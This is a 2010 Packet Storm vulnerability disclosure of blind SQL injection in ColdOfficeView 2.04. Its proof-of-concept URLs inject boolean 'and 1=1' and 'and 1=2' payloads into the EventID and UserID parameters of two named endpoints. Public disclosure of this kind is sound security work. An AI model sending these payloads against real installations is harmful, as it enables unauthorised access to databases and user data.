ColdOfficeView 2.04 Blind SQL Injection

2010-09-08T00:00:00
ID PACKETSTORM:93595
Type packetstorm
Reporter mr_me
Modified 2010-09-08T00:00:00

Description

                                        
                                            `# ColdGen - coldofficeview v2.04 Remote Blind SQL Injection vulnerabilities  
# Vendor: http://www.coldgen.com/  
# Found by: mr_me (net-ninja.net)  
  
PoC's  
1. http://[target]/[path]/index.cfm?fuseaction=ViewEventDetails&EventID=[Blind SQLi]  
http://[target]/[path]/index.cfm?fuseaction=ViewEventDetails&EventID=1 and 1=1 << true  
http://[target]/[path]/index.cfm?fuseaction=ViewEventDetails&EventID=1 and 1=2 << false  
  
2. http://[target]/[path]/index.cfm?fuseaction=EditProfile&UserID=[Blind SQLi]  
http://[target]/[path]/index.cfm?fuseaction=EditProfile&UserID=1 and 1=1 << true  
http://[target]/[path]/index.cfm?fuseaction=EditProfile&UserID=1 and 1=2 << false  
  
`